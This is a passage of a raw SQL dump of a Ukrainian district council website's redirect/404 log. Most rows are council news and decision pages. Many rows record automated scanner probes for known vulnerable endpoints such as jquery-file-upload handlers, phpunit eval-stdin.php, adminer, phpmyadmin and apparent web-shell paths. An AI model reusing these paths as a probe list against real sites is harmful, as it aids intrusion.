00:00:00',301),(34499,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-2203201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:52','0000-00-00 00:00:00',301),(34500,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-1506201',NULL,'https://malyn-rayrada.gov.ua/','',1,0,'2020-04-04 18:09:53','0000-00-00 00:00:00',301),(34501,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-0202201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:53','0000-00-00 00:00:00',301),(34502,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-1406201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:54','0000-00-00 00:00:00',301),(34503,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-151217-',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:54','0000-00-00 00:00:00',301),(34504,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-271017-',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:54','0000-00-00 00:00:00',301),(34505,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-2303201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:54','0000-00-00 00:00:00',301),(34506,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-16-06-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:54','0000-00-00 00:00:00',301),(34507,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-2807201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:54','0000-00-00 00:00:00',301),(34508,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-07-12-2',NULL,'https://malyn-rayrada.gov.ua/','',1,0,'2020-04-04 18:09:55','0000-00-00 00:00:00',301),(34509,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-0908201',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:55','0000-00-00 00:00:00',301),(34510,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-22-03-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:56','0000-00-00 00:00:00',301),(34511,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-17-03-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:56','0000-00-00 00:00:00',301),(34512,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-27-12-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:57','0000-00-00 00:00:00',301),(34513,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-22-04-2',NULL,'https://malyn-rayrada.gov.ua/','',1,0,'2020-04-04 18:09:57','0000-00-00 00:00:00',301),(34514,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-09-11-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:57','0000-00-00 00:00:00',301),(34515,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-26-10-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:57','0000-00-00 00:00:00',301),(34516,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-21-12-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:58','0000-00-00 00:00:00',301),(34517,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-03-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:58','0000-00-00 00:00:00',301),(34518,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-31-08-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:58','0000-00-00 00:00:00',301),(34519,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-13-11-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:58','0000-00-00 00:00:00',301),(34520,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-22-07-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:58','0000-00-00 00:00:00',301),(34521,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-21-10-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:59','0000-00-00 00:00:00',301),(34522,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:59','0000-00-00 00:00:00',301),(34523,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-13-05-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:59','0000-00-00 00:00:00',301),(34524,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-15-01-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:09:59','0000-00-00 00:00:00',301),(34525,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2',NULL,'https://malyn-rayrada.gov.ua/','',2,0,'2020-04-04 18:10:00','0000-00-00 00:00:00',301),(34526,'https://malyn-rayrada.gov.ua/img',NULL,'https://malyn-rayrada.gov.ua/index.php?start=231','',2,0,'2020-04-04 18:31:53','0000-00-00 00:00:00',301),(34527,'https://malyn-rayrada.gov.ua/attachments/article/2329/паспорт',NULL,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/pasporty-biudzhetnykh-prohram','',2,0,'2020-04-04 18:32:39','0000-00-00 00:00:00',301),(34528,'https://malyn-rayrada.gov.ua/attachments/article/2243/паспорти',NULL,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/pasporty-biudzhetnykh-prohram','',2,0,'2020-04-04 18:32:43','0000-00-00 00:00:00',301),(34529,'https://malyn-rayrada.gov.ua/index.php/1796-vidbulas-19-pozachergova-sesiya-7-sklikannya',NULL,'','',12,0,'2020-04-04 19:53:20','0000-00-00 00:00:00',301),(34530,'https://www.malyn-rayrada.gov.ua/attachments/article/2370/â„–1 ð¿ñ€ð¾ñ‚ð¾ðºð¾ð».pdf',NULL,'','',1,0,'2020-04-05 05:28:48','0000-00-00 00:00:00',301),(34531,'https://malyn-rayrada.gov.ua/configbak.php',NULL,'','',2,0,'2020-04-05 20:41:50','0000-00-00 00:00:00',301),(34532,'https://malyn-rayrada.gov.ua/index.php/1606-vitaemo-z-dnem-mistsevogo-samovryaduvannya',NULL,'','',13,0,'2020-04-06 02:15:50','0000-00-00 00:00:00',301),(34533,'https://www.malyn-rayrada.gov.ua/index.php/2366-vitaemo-iz-svyatom-vesni',NULL,'','',5,0,'2020-04-06 05:01:21','0000-00-00 00:00:00',301),(34534,'https://malyn-rayrada.gov.ua/index.php/1761-pro-pensijnu-reformu',NULL,'','',28,0,'2020-04-06 17:47:14','0000-00-00 00:00:00',301),(34535,'https://malyn-rayrada.gov.ua/images/stories/prisyagni.jpg&rurl=https://malyn-rayrada.gov.ua/index.php/2299-ogoloshennya-pro-formuvannya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu&size=54kb&name=малинська+районна+рада+—+оголошення+про+формування+списку+...&oid=3&h=355&w=640&turl=https://tse1.mm.bing.net/th?id=oip.1ux2q4oyoiju6plgavkkswhaeg&pid=api&rs=1&c=1&qlt=95&w=218&h=120&tt=малинська+районна+рада+—+оголошення+про+формування+списку+...&sigr=13mklt8i1&sigit=1354b9bsl&sigi=11ht13cs8&sign=13gvlka8q&sigt=13gvlka8q',NULL,'','',1,0,'2020-04-07 10:45:58','0000-00-00 00:00:00',301),(34536,'https://www.malyn-rayrada.gov.ua/index.php/1692-vidbulas-15-sesiya-rajonnoji-radi',NULL,'','',13,0,'2020-04-07 14:43:57','0000-00-00 00:00:00',301),(34537,'https://malyn-rayrada.gov.ua/index.php/1757-navchalis-u-sferi-tsivilnogo-zakhistu',NULL,'','',9,0,'2020-04-07 15:27:30','0000-00-00 00:00:00',301),(34538,'https://malyn-rayrada.gov.ua/index.php/1692-vidbulas-15-sesiya-rajonnoji-radi',NULL,'','',29,0,'2020-04-07 15:29:43','0000-00-00 00:00:00',301),(34539,'https://malyn-rayrada.gov.ua/xxsssseee',NULL,'','',2,0,'2020-04-07 19:23:40','0000-00-00 00:00:00',301),(34540,'https://www.malyn-rayrada.gov.ua/index.php/1712-05-kvitnya-2017-roku-vidbulasya-narada-iz-silskimi-selishchnim-golovami',NULL,'','',5,0,'2020-04-08 02:25:55','0000-00-00 00:00:00',301),(34541,'https://malyn-rayrada.gov.ua/wangdafa',NULL,'','',7,0,'2020-04-09 00:58:10','0000-00-00 00:00:00',301),(34542,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2307-pro-stvorennya-komunalnoji-ustanovi-malinskij-rajonnij-tsentr-po-obslugovuvannyu-zakladiv-osviti-malinskoji-rajonnoji-radi',NULL,'','',3,0,'2020-04-09 05:58:19','0000-00-00 00:00:00',301),(34543,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2307-pro-stvorennya-komunalnoji-ustanovi-malinskij-rajonnij-tsentr-po-obslugovuvannyu-zakladiv-osviti-malinskoji-rajonnoji-radi',NULL,'','',19,0,'2020-04-09 06:34:21','0000-00-00 00:00:00',301),(34544,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2308-pro-peredachu-osnovnikh-zasobiv-ta-neoborotnikh-materialnikh-aktiviv-na-balans-komunalnoji-ustanovi-malinskij-rajonnij-tsentr-po-obslugovuvannyu-zakladiv-osviti-malinskoji-rajonnoji-radi',NULL,'','',16,0,'2020-04-09 06:34:23','0000-00-00 00:00:00',301),(34545,'https://malyn-rayrada.gov.ua/index.php/1671-ogoloshennya-pro-konkurs-na-zamishchennya-vakantnoji-posadi-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-skurativskogo-malinskoji-rajonnoji-radi',NULL,'','',21,0,'2020-04-09 14:07:48','0000-00-00 00:00:00',301),(34546,'https://malyn-rayrada.gov.ua/index.php/1798-sogodni-23-serpnya-v-ukrajini-vidznachaetsya-den-derzhavnogo-prapora',NULL,'','',11,0,'2020-04-09 14:20:26','0000-00-00 00:00:00',301),(34547,'https://malyn-rayrada.gov.ua/index.php/1710-ogoloshennya',NULL,'','',8,0,'2020-04-09 21:48:24','0000-00-00 00:00:00',301),(34548,'https://malyn-rayrada.gov.ua/index.php/1740-vitaemo-shkolyariv-vchiteliv-ta-batkiv-iz-svyatom-ostannogo-dzvonika',NULL,'','',16,0,'2020-04-10 08:04:23','0000-00-00 00:00:00',301),(34549,'https://www.malyn-rayrada.gov.ua/index.php/1714-vitaemo-iz-velikodnem',NULL,'','',3,0,'2020-04-10 09:45:12','0000-00-00 00:00:00',301),(34550,'https://malyn-rayrada.gov.ua/jsupload/server/php/',NULL,'','',1,0,'2020-04-10 10:44:26','0000-00-00 00:00:00',301),(34551,'https://malyn-rayrada.gov.ua/jquery_files/server/php/',NULL,'','',1,0,'2020-04-10 10:44:29','0000-00-00 00:00:00',301),(34552,'https://malyn-rayrada.gov.ua/jquery/server/php/',NULL,'','',1,0,'2020-04-10 10:44:33','0000-00-00 00:00:00',301),(34553,'https://malyn-rayrada.gov.ua/js/file-uploader/server/php/',NULL,'','',1,0,'2020-04-10 10:44:35','0000-00-00 00:00:00',301),(34554,'https://malyn-rayrada.gov.ua/file-uploader/server/php/',NULL,'','',1,0,'2020-04-10 10:44:41','0000-00-00 00:00:00',301),(34555,'https://malyn-rayrada.gov.ua/fileuploader/server/php/',NULL,'','',1,0,'2020-04-10 10:44:45','0000-00-00 00:00:00',301),(34556,'https://malyn-rayrada.gov.ua/file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:44:48','0000-00-00 00:00:00',301),(34557,'https://malyn-rayrada.gov.ua/uploader/server/php/',NULL,'','',1,0,'2020-04-10 10:44:50','0000-00-00 00:00:00',301),(34558,'https://malyn-rayrada.gov.ua/fileupload/server/php/',NULL,'','',1,0,'2020-04-10 10:44:52','0000-00-00 00:00:00',301),(34559,'https://malyn-rayrada.gov.ua/admin/server/php/',NULL,'','',1,0,'2020-04-10 10:44:55','0000-00-00 00:00:00',301),(34560,'https://malyn-rayrada.gov.ua/admin/js/lib/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:44:56','0000-00-00 00:00:00',301),(34561,'https://malyn-rayrada.gov.ua/assets/file-uploader/server/php/',NULL,'','',1,0,'2020-04-10 10:45:01','0000-00-00 00:00:00',301),(34562,'https://malyn-rayrada.gov.ua/public/assets/jquery-file-upload-9.5.0/server/php/',NULL,'','',1,0,'2020-04-10 10:45:06','0000-00-00 00:00:00',301),(34563,'https://malyn-rayrada.gov.ua/assets/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:07','0000-00-00 00:00:00',301),(34564,'https://malyn-rayrada.gov.ua/backend/assets/global/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:08','0000-00-00 00:00:00',301),(34565,'https://malyn-rayrada.gov.ua/assets/assets/global/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:09','0000-00-00 00:00:00',301),(34566,'https://malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:09','0000-00-00 00:00:00',301),(34567,'https://malyn-rayrada.gov.ua/admin/drag-drop/server/php/',NULL,'','',1,0,'2020-04-10 10:45:10','0000-00-00 00:00:00',301),(34568,'https://malyn-rayrada.gov.ua/admin/global/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:11','0000-00-00 00:00:00',301),(34569,'https://malyn-rayrada.gov.ua/assets/global/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:11','0000-00-00 00:00:00',301),(34570,'https://malyn-rayrada.gov.ua/plugins/jquery-file-upload/server/php/',NULL,'','',2,0,'2020-04-10 10:45:12','0000-00-00 00:00:00',301),(34571,'https://malyn-rayrada.gov.ua/plugins/server/php/',NULL,'','',1,0,'2020-04-10 10:45:13','0000-00-00 00:00:00',301),(34572,'https://malyn-rayrada.gov.ua/addvideo/server/php/',NULL,'','',1,0,'2020-04-10 10:45:13','0000-00-00 00:00:00',301),(34573,'https://malyn-rayrada.gov.ua/plugins/fileupload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:14','0000-00-00 00:00:00',301),(34574,'https://malyn-rayrada.gov.ua/js/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:15','0000-00-00 00:00:00',301),(34575,'https://malyn-rayrada.gov.ua/assets/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:15','0000-00-00 00:00:00',301),(34576,'https://malyn-rayrada.gov.ua/admin/assets/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:16','0000-00-00 00:00:00',301),(34577,'https://malyn-rayrada.gov.ua/cms/server/php/',NULL,'','',1,0,'2020-04-10 10:45:17','0000-00-00 00:00:00',301),(34578,'https://malyn-rayrada.gov.ua/public/upload_nhieuanh/server/php/',NULL,'','',1,0,'2020-04-10 10:45:17','0000-00-00 00:00:00',301),(34579,'https://malyn-rayrada.gov.ua/public/server/php/',NULL,'','',1,0,'2020-04-10 10:45:18','0000-00-00 00:00:00',301),(34580,'https://malyn-rayrada.gov.ua/admin/gallery/server/php/',NULL,'','',1,0,'2020-04-10 10:45:18','0000-00-00 00:00:00',301),(34581,'https://malyn-rayrada.gov.ua/jquery-file-upload/server/php/',NULL,'','',1,0,'2020-04-10 10:45:19','0000-00-00 00:00:00',301),(34582,'https://malyn-rayrada.gov.ua/vendor/server/php/',NULL,'','',1,0,'2020-04-10 10:45:20','0000-00-00 00:00:00',301),(34583,'https://www.malyn-rayrada.gov.ua/index.php/1345-vidbulas-4-pozachergova-sesiya-rajonnoji-radi',NULL,'','',2,0,'2020-04-10 14:21:36','0000-00-00 00:00:00',301),(34584,'https://malyn-rayrada.gov.ua/index.php/1433-26-kvitnya-2016-roku-vipovnyuetsya-30-rokiv-yak-vidbulasya-najmasshtabnisha-tekhnogenna-katastrofa-za-ves-chas-vikoristannya-atomnoji-energetiki-avariya-na-chornobilskij-atomnij-elektrostantsiji',NULL,'','',14,0,'2020-04-10 15:01:17','0000-00-00 00:00:00',301),(34585,'https://www.malyn-rayrada.gov.ua/index.php/1445-final-kubku-rajonu-z-futbolu',NULL,'','',2,0,'2020-04-10 18:13:49','0000-00-00 00:00:00',301),(34586,'https://malyn-rayrada.gov.ua/index.php/1516-informatsiya-shchodo-vnesennya-zmin-v-rajonnij-byudzhet-2016-roku',NULL,'','',10,0,'2020-04-11 15:42:55','0000-00-00 00:00:00',301),(34587,'https://malyn-rayrada.gov.ua/index.php/1701-vidbulas-16-pozachergova-sesiya-rajonnoji-radi',NULL,'','',11,0,'2020-04-11 16:58:58','0000-00-00 00:00:00',301),(34588,'https://malyn-rayrada.gov.ua/index.php/1758-do-vidoma-sub-ektiv-pidpriemnitskoji-diyalnosti?tmpl=component&print=1&layout=default&page=',NULL,'','',2,0,'2020-04-11 16:59:31','0000-00-00 00:00:00',301),(34589,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2372-pro-zatverdzhennya-programi-provedennya-inventarizatsiji-ta-normativnoji-groshovoji-otsinki-zemel-v-mezhakh-malinskogo-rajonu-na-2020-rik',NULL,'','',15,0,'2020-04-11 17:59:11','0000-00-00 00:00:00',301),(34590,'https://malyn-rayrada.gov.ua/index.php/1360-20-lyutogo-den-gerojiv-nebesnoji-sotni-2',NULL,'','',17,0,'2020-04-11 18:49:09','0000-00-00 00:00:00',301),(34591,'https://malyn-rayrada.gov.ua/index.php/1726-podatkova-znizhka',NULL,'','',8,0,'2020-04-11 19:03:19','0000-00-00 00:00:00',301),(34592,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2377-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-malinskogo-rajonu-na-2020-rik',NULL,'','',8,0,'2020-04-12 00:03:51','0000-00-00 00:00:00',301),(34593,'https://www.malyn-rayrada.gov.ua/index.php/1671-ogoloshennya-pro-konkurs-na-zamishchennya-vakantnoji-posadi-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-skurativskogo-malinskoji-rajonnoji-radi',NULL,'','',1,0,'2020-04-12 03:50:53','0000-00-00 00:00:00',301),(34594,'https://www.malyn-rayrada.gov.ua/index.php/1448-darujmo-radist-dityam',NULL,'','',5,0,'2020-04-12 10:52:54','0000-00-00 00:00:00',301),(34595,'https://malyn-rayrada.gov.ua/index.php/1712-05-kvitnya-2017-roku-vidbulasya-narada-iz-silskimi-selishchnim-golovami',NULL,'','',13,0,'2020-04-12 18:59:34','0000-00-00 00:00:00',301),(34596,'https://www.malyn-rayrada.gov.ua/index.php/1032-tarifi-dlya-naselennya-na-elektroenergiyu',NULL,'','',5,0,'2020-04-12 21:08:55','0000-00-00 00:00:00',301),(34597,'https://www.malyn-rayrada.gov.ua/index.php/1340-pro-indeksatsiyu-normativnoji-groshovoji-otsinki',NULL,'','',4,0,'2020-04-12 22:40:02','0000-00-00 00:00:00',301),(34598,'https://malyn-rayrada.gov.ua/index.php/931-vbivali-golodom-nashu-svobodu-ne-pidkoreni-v-33-mu-neperemozhni',NULL,'','',17,0,'2020-04-13 03:36:43','0000-00-00 00:00:00',301),(34599,'https://malyn-rayrada.gov.ua/phpinfo.php',NULL,'','',6,0,'2020-04-13 08:59:21','0000-00-00 00:00:00',301),(34600,'https://malyn-rayrada.gov.ua/router.php',NULL,'','',1,0,'2020-04-13 10:10:01','0000-00-00 00:00:00',301),(34601,'https://www.malyn-rayrada.gov.ua/index.php/1773-ogoloshennya-pro-namiri-peredati-nerukhome-majno-v-orendu',NULL,'','',1,0,'2020-04-14 12:20:01','0000-00-00 00:00:00',301),(34602,'https://www.malyn-rayrada.gov.ua/index.php/1648-do-vidoma-vlasnikiv-zemli-ta-zemlekoristuvachiv',NULL,'','',9,0,'2020-04-14 14:14:26','0000-00-00 00:00:00',301),(34603,'https://www.malyn-rayrada.gov.ua/index.php/1796-vidbulas-19-pozachergova-sesiya-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2020-04-14 16:27:54','0000-00-00 00:00:00',301),(34604,'https://malyn-rayrada.gov.ua/index.php/1758-do-vidoma-sub-ektiv-pidpriemnitskoji-diyalnosti',NULL,'','',13,0,'2020-04-16 09:08:08','0000-00-00 00:00:00',301),(34605,'https://malyn-rayrada.gov.ua/index.php/1520-elektronne-deklaruvannya',NULL,'','',4,0,'2020-04-16 12:35:23','0000-00-00 00:00:00',301),(34606,'https://malyn-rayrada.gov.ua/index.php/1443-vidbulas-7-pozachergova-sesiya-malinskoji-rajonnoji-radi',NULL,'','',13,0,'2020-04-17 08:05:58','0000-00-00 00:00:00',301),(34607,'https://malyn-rayrada.gov.ua/forum/',NULL,'https://malyn-rayrada.gov.ua/forum/','',2,0,'2020-04-17 10:32:31','0000-00-00 00:00:00',301),(34608,'https://malyn-rayrada.gov.ua/index.php/1401-vidbulas-5-sesiya-malinskoji-rajonnoji-radi',NULL,'','',13,0,'2020-04-17 15:41:23','0000-00-00 00:00:00',301),(34609,'https://malyn-rayrada.gov.ua/index.php/1648-do-vidoma-vlasnikiv-zemli-ta-zemlekoristuvachiv',NULL,'','',21,0,'2020-04-17 18:25:15','0000-00-00 00:00:00',301),(34610,'https://www.malyn-rayrada.gov.ua/index.php/1701-vidbulas-16-pozachergova-sesiya-rajonnoji-radi',NULL,'','',3,0,'2020-04-18 12:46:54','0000-00-00 00:00:00',301),(34611,'https://malyn-rayrada.gov.ua/wp-check.php',NULL,'','',1,0,'2020-04-18 15:32:42','0000-00-00 00:00:00',301),(34612,'https://malyn-rayrada.gov.ua//wp-content/uploads/upload_index.php?auth=hwiotxumithglxhjbn8yn',NULL,'','',1,0,'2020-04-18 18:34:36','0000-00-00 00:00:00',301),(34613,'https://www.malyn-rayrada.gov.ua//wp-content/uploads/upload_index.php?auth=hwiotxumithglxhjbn8yn',NULL,'','',1,0,'2020-04-18 18:35:07','0000-00-00 00:00:00',301),(34614,'https://malyn-rayrada.gov.ua//wp-content/uploads/upload_index.php?auth=jqr387lk0ggrb65tytsa',NULL,'','',1,0,'2020-04-18 18:35:23','0000-00-00 00:00:00',301),(34615,'https://www.malyn-rayrada.gov.ua//wp-content/uploads/upload_index.php?auth=jqr387lk0ggrb65tytsa',NULL,'','',1,0,'2020-04-18 18:35:25','0000-00-00 00:00:00',301),(34616,'https://malyn-rayrada.gov.ua/attachments/article/2378/ðÿð’ðÿð“.pdf',NULL,'','',1,0,'2020-04-18 18:44:01','0000-00-00 00:00:00',301),(34617,'https://www.malyn-rayrada.gov.ua/index.php/1748-terminovo-do-30-chervnya-2017-roku-provoditsya-nabir-v-mirotvorchij-batalon-m-novograd-volinskij',NULL,'','',4,0,'2020-04-18 19:55:19','0000-00-00 00:00:00',301),(34618,'https://www.malyn-rayrada.gov.ua/index.php/1758-do-vidoma-sub-ektiv-pidpriemnitskoji-diyalnosti',NULL,'','',3,0,'2020-04-19 03:22:39','0000-00-00 00:00:00',301),(34619,'https://malyn-rayrada.gov.ua/index.php/1345-vidbulas-4-pozachergova-sesiya-rajonnoji-radi',NULL,'','',11,0,'2020-04-19 05:05:08','0000-00-00 00:00:00',301),(34620,'https://www.malyn-rayrada.gov.ua/index.php/1457-vitaemo-iz-svyatom-ostannogo-dzvonika',NULL,'','',7,0,'2020-04-20 06:24:11','0000-00-00 00:00:00',301),(34621,'https://malyn-rayrada.gov.ua/index.php/2383-khristos-voskres-voistinu-voskres',NULL,'','',5,0,'2020-04-20 12:25:39','0000-00-00 00:00:00',301),(34622,'https://www.malyn-rayrada.gov.ua/index.php/1641-do-uvagi-zhiteliv-malinskogo-rajonu',NULL,'','',5,0,'2020-04-21 07:38:24','0000-00-00 00:00:00',301),(34623,'https://malyn-rayrada.gov.ua/workspace/drupal/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-21 13:16:10','0000-00-00 00:00:00',301),(34624,'https://malyn-rayrada.gov.ua/drupal/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-21 13:16:24','0000-00-00 00:00:00',301),(34625,'https://malyn-rayrada.gov.ua/sites/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-21 13:16:33','0000-00-00 00:00:00',301),(34626,'https://malyn-rayrada.gov.ua/sites/default/libraries/mailchimp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2020-04-21 13:16:54','0000-00-00 00:00:00',301),(34627,'https://malyn-rayrada.gov.ua/attachments/article/1942/history malyn region4.pdf',NULL,'','',3,0,'2020-04-21 17:05:02','0000-00-00 00:00:00',301),(34628,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2309-pro-rajonnij-byudzhet-malinskogo-rajonu-na-2020-rik',NULL,'','',1,0,'2020-04-23 12:24:56','0000-00-00 00:00:00',301),(34629,'https://malyn-rayrada.gov.ua/index.php/1429-vidbulas-6-pozachergova-sesiya-malinskoji-rajonnoji-radi',NULL,'','',12,0,'2020-04-23 21:39:27','0000-00-00 00:00:00',301),(34630,'https://www.malyn-rayrada.gov.ua/index.php/1757-navchalis-u-sferi-tsivilnogo-zakhistu',NULL,'','',8,0,'2020-04-25 14:11:42','0000-00-00 00:00:00',301),(34631,'https://malyn-rayrada.gov.ua/index.php/1448-darujmo-radist-dityam',NULL,'','',11,0,'2020-04-26 21:46:36','0000-00-00 00:00:00',301),(34632,'https://malyn-rayrada.gov.ua/index.php/1713-pratsivniki-aparatu-rajonnoji-radi-komunalnikh-zakladiv-rajonu-doluchilis-do-pribirannya-pered-velikodnem',NULL,'','',7,0,'2020-04-26 22:54:42','0000-00-00 00:00:00',301),(34633,'https://malyn-rayrada.gov.ua/index.php/1646-do-vidoma-deputativ-mistsevikh-rad-silskikh-ta-selishchnikh-goliv',NULL,'','',5,0,'2020-04-26 23:33:08','0000-00-00 00:00:00',301),(34634,'https://www.malyn-rayrada.gov.ua/adminer.php',NULL,'','',2,0,'2020-04-27 02:42:06','0000-00-00 00:00:00',301),(34635,'https://malyn-rayrada.gov.ua/cache/accesson1.php',NULL,'https://malyn-rayrada.gov.ua/index.php/component/users/?view=login','',3,0,'2020-04-30 08:52:01','0000-00-00 00:00:00',301),(34636,'https://malyn-rayrada.gov.ua/old-wp/',NULL,'','',2,0,'2020-04-30 13:08:48','0000-00-00 00:00:00',301),(34637,'https://malyn-rayrada.gov.ua/old-site/',NULL,'','',2,0,'2020-04-30 13:08:48','0000-00-00 00:00:00',301),(34638,'https://malyn-rayrada.gov.ua/bak/',NULL,'','',2,0,'2020-04-30 13:08:51','0000-00-00 00:00:00',301),(34639,'https://malyn-rayrada.gov.ua/sito/',NULL,'','',1,0,'2020-04-30 13:08:52','0000-00-00 00:00:00',301),(34640,'https://malyn-rayrada.gov.ua/+/',NULL,'','',1,0,'2020-04-30 13:08:53','0000-00-00 00:00:00',301),(34641,'https://www.malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2020-05-01 10:06:04','0000-00-00 00:00:00',301),(34642,'https://malyn-rayrada.gov.ua/index.php/1727-do-vidoma-pensioneriv',NULL,'','',5,0,'2020-05-01 10:55:35','0000-00-00 00:00:00',301),(34643,'https://malyn-rayrada.gov.ua/ks_inc/common.js../1.php',NULL,'','',1,0,'2020-05-02 23:09:03','0000-00-00 00:00:00',301),(34644,'https://www.malyn-rayrada.gov.ua/index.php/1743-uvaga-botulizm',NULL,'','',2,0,'2020-05-03 20:05:34','0000-00-00 00:00:00',301),(34645,'https://www.malyn-rayrada.gov.ua/db.php',NULL,'','',1,0,'2020-05-04 23:05:00','0000-00-00 00:00:00',301),(34646,'https://malyn-rayrada.gov.ua/phpmyadmin',NULL,'','',1,0,'2020-05-08 11:42:32','0000-00-00 00:00:00',301),(34647,'https://malyn-rayrada.gov.ua/index.php/1645-zmagalis-shkolyari',NULL,'','',3,0,'2020-05-09 09:20:18','0000-00-00 00:00:00',301),(34648,'https://malyn-rayrada.gov.ua/pma',NULL,'','',1,0,'2020-05-09 10:40:42','0000-00-00 00:00:00',301),(34649,'https://malyn-rayrada.gov.ua/index.php/1787-informatsiya-shchodo-vnesenikh-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',9,0,'2020-05-10 00:56:48','0000-00-00 00:00:00',301),(34650,'https://malyn-rayrada.gov.ua/system/adminpanel.html',NULL,'','',2,0,'2020-05-10 16:20:52','0000-00-00 00:00:00',301),(34651,'https://malyn-rayrada.gov.ua/myadmin',NULL,'','',1,0,'2020-05-11 07:47:07','0000-00-00 